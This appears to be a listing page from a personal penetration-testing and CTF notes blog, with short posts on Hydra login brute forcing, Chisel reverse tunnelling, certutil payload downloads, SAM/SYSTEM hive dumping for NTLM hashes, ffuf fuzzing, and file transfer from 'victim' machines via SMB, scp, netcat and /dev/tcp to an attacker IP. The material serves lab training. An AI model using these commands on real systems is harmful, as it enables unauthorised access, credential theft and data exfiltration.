Gajendra Mahato
Tips & Tricks Cover

Brute Force Login Page with Hydra

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we’ll explore brute-forcing login pages using different HTTP methods with Hydra.

Brute Force Login Page with HTTP GET Method:

```
hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080
hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html
```

Initiates the Hydra tool and specifies the target URL using the HTTP GET method.

Brute Force Login Page with HTTP POST Method:

```
hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088
hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f
```

Initiates the Hydra tool and specifies the target URL using the HTTP POST method.

Brute Force Credentials of POP3 Protocol:

```
hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007
```

Brute Force Credentials of SSH Protocol:

```
hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP
```

Brute Force Credentials of SNMP Protocol:

```
hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137
```

Hydra Options Explained:

- `-C <file>`: Specifies the path to a file containing a list of username:password combinations, e.g. `admin:admin`.
- `-L <username file>`: Specifies the path to a file containing a list of usernames.
- `-l <username>`: Specifies a single username to use for the brute-force attack.
- `-P <password file>`: Specifies the path to a file containing a list of passwords.
- `-p <password>`: Specifies a single password to use for the brute-force attack.
- `-f` / `-F`: Exit when a login/password pair is found (with `-M`: `-f` per host, `-F` global).
- `$IP`: Represents the IP address of the target.
- `-s <port>`: Specifies the target port.
- `http-get`: Initiates a brute-force attack using the HTTP GET method.
- `http-post-form`: Initiates a brute-force attack using the HTTP POST method with form parameters.
- `pop3://<IP>`: Specifies the POP3 protocol and target IP address.
- `ssh://<IP>`: Specifies the SSH protocol and target IP address.
- `snmp://<IP>`: Specifies the SNMP protocol and target IP address.

Additional flags and options may be included for more detailed configuration and verbose output.

January 13, 2026 · 2 min · Gajendra Mahato

Chisel Port Forwarding Guide

🧠 What is Chisel?

Chisel is a fast TCP/UDP tunnel over HTTP, useful for port forwarding and pivoting, especially during red teaming or CTFs.

🔥 Attacker Machine Setup (Chisel Server)

Start Chisel in reverse mode on the attacker machine:

```
./chisel_1.5.1 server -p 9005 --reverse
```

- `-p 9005`: Listen on port 9005
- `--reverse`: Accept reverse port forwarding connections

🎯 Target Machine Setup (Chisel Client)

Forward all traffic to attacker:

```
./chisel client 10.10.14.19:9005 R:socks
```

This sets up a SOCKS proxy from the target to the attacker’s Chisel server ...

January 13, 2026 · 1 min · Gajendra Mahato

Downloading Files from Linux to Windows Using Windows CLI

Method 1: Using an HTTP Server

Step 1: Start an HTTP server on Linux

Open a terminal on your Linux machine and run:

```
sudo python3 -m http.server 80
```

Step 2: Download the file using certutil on Windows

Open Command Prompt or PowerShell on your Windows machine and run:

```
certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe"
```

Method 2: Using Invoke-WebRequest

Step 1: Start an HTTP server on Linux

Same as Step 1 in Method 1.

Step 2: Download the file using Invoke-WebRequest on Windows

Open PowerShell on your Windows machine and run: ...

January 13, 2026 · 2 min · Gajendra Mahato

Dumping NTLM Hashes via Non-Interactive Shell (Windows)

Step 1: Save Registry Hives (SAM, SECURITY, SYSTEM)

Run these commands on the target Windows machine:

```
reg.exe save hklm\sam sam
reg.exe save hklm\security security
reg.exe save hklm\system system
```

These commands save the SAM, SECURITY, and SYSTEM hives as files in the current directory.

📂 Copy these files to your attacker machine for offline cracking.

Step 2: Extract Hashes from Saved Files

Two popular tools to extract NTLM hashes:

Using samdump2:

```
samdump2 ./system ./sam
```

Using Impacket’s secretsdump.py:

```
secretsdump.py -sam sam -system system LOCAL
```

Sample Output Explained

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
```

- 👤 Username (e.g., Administrator)
- 🆔 User RID/Group (e.g., 500)
- 🔐 LM hash (usually empty/disabled)
- 🗝️ NT hash (this is what you crack)

🛠️ Step 3: Crack NTLM Hashes

Extract NT hashes (4th field) and save in hashes.txt: ...

January 13, 2026 · 1 min · Gajendra Mahato

FFUF - Fuzz Faster U Fool

1. Directory and File Brute Forcing

Basic Directory Fuzzing:

```
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/
```

Fuzz common directory names (e.g., /admin/, /uploads/).

2. Fuzzing Parameters

Basic Parameter Fuzzing:

```
ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ
```

Replaces FUZZ with words from the wordlist to test URL parameters.

Filter by Status Code:

```
ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200
```

Shows responses only for the 200 OK status code.

Filter by Content Size:

```
ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150
```

Filters out responses whose size is exactly 150 bytes.

Fuzzing with JSON Payload (for APIs): ...

January 13, 2026 · 3 min · Gajendra Mahato

File Sharing Over SMB Using `smbserver.py`

🖥️ On the Linux Server (Attacker Machine)

Start an SMB server using impacket-smbserver:

```
sudo smbserver.py gnu $(pwd) -smb2support
```

- `gnu`: Share name
- `$(pwd)`: Current working directory to be shared
- `-smb2support`: Enables SMB2 support for better compatibility with newer Windows systems

🪟 On the Windows Client (Victim Machine)

Access the shared file using UNC path:

```
\\10.10.14.42\gnu\winPEAS.exe
```

🔸 Replace 10.10.14.42 with the IP of your Linux (attacker) machine

🔸 You can also map this as a network drive or copy files directly using copy or xcopy in CMD or PowerShell ...

January 13, 2026 · 1 min · Gajendra Mahato

File Transfer Over SSH Using `scp`

📤 Uploading/Sending a Directory from Local to SSH Server

Use either of the following commands:

```
scp -P 22 -r ./shell/* [email protected]:/home/gnu/shell/
```

OR

```
scp -r -P 22 ./shell [email protected]:/home/gnu/shell/
```

📥 Downloading/Receiving a Directory from SSH Server to Local

```
scp -P 22 -r [email protected]:/home/gnu/* ./gnu/
```

OR

```
scp -r -P 22 [email protected]:/home/gnu ./gnu/
```

📤 Uploading/Sending a File from Local to SSH Server

```
scp -P 22 ./shell.php [email protected]:/home/gnu/shell.php
```

📥 Downloading/Receiving a File from SSH Server to Local

```
scp -P 22 [email protected]:/home/gnu/flag.txt ./flag.txt
```

📝 Note: ...

January 13, 2026 · 1 min · Gajendra Mahato

File Transfer Using Netcat

🖥️ Step 1: Start Listening on Local Machine (Kali)

Run the following command to start listening for incoming files:

```
nc -lp 4444 > filename   # waiting for receiving the files
```

📤 Step 2: Transfer File from Remote Machine (Victim)

Run this command on the victim machine to send the file:

```
nc -w 3 10.10.14.19 4444 < filename   # it's time to send the file
```

OR, use this alternative method:

```
cat filename > /dev/tcp/10.10.14.19/4444
```

Note: 10.10.14.19 is the IP address of the local machine (tun0). ...

January 13, 2026 · 1 min · Gajendra Mahato

File Transfer via FTP on Linux

🧰 Using ftp Command

1. Connect to FTP Server

Replace 10.10.10.98 with your target FTP server IP or domain:

```
ftp 10.10.10.98
```

2. Login as Anonymous

```
Name (10.10.10.98:yourusername): anonymous
Password: (press Enter)
```

3. Set Binary Mode

To handle all types of files properly:

```
ftp> binary
```

4. Disable Prompting (for Multiple Files)

```
ftp> prompt off
Interactive mode off.
```

5. Download Files (Wildcard)

```
ftp> mget *
```

⚠️ Note: Standard ftp does not support recursive download. For recursive download, use a better client like lftp. ...

January 13, 2026 · 1 min · Gajendra Mahato

IDA Debugger Key Notes (Default)

Execution control

- F7 runs step into, so it enters the next function
- F8 runs step over, so it goes to the next instruction without entering the function
- F9 runs continue, so the process runs until a breakpoint or crash
- Ctrl + F2 stops the debugger
- Ctrl + F9 restarts the process

Breakpoints

- F2 toggles a breakpoint on the current line
- Shift + F2 deletes all breakpoints
- Alt + B opens the breakpoint list

Navigation during debug

- EIP / RIP highlighted shows the current instruction
- Space switches between graph view and linear view
- G jumps to an address
- Esc goes back

Registers and memory

- Alt + R opens the registers window
- Alt + M opens the memory window
- Alt + S opens the stack view
- Ctrl + Alt + R refreshes registers

Practical CTF flow

- Press F9 to run the program
- Hit F2 on main or the check function
- Use F8 to trace logic
- Use F7 only when entering a crypto or check routine
- Watch registers and stack

Laptop Friendly Tip

If F keys are painful then remap: ...

January 13, 2026 · 1 min · Gajendra Mahato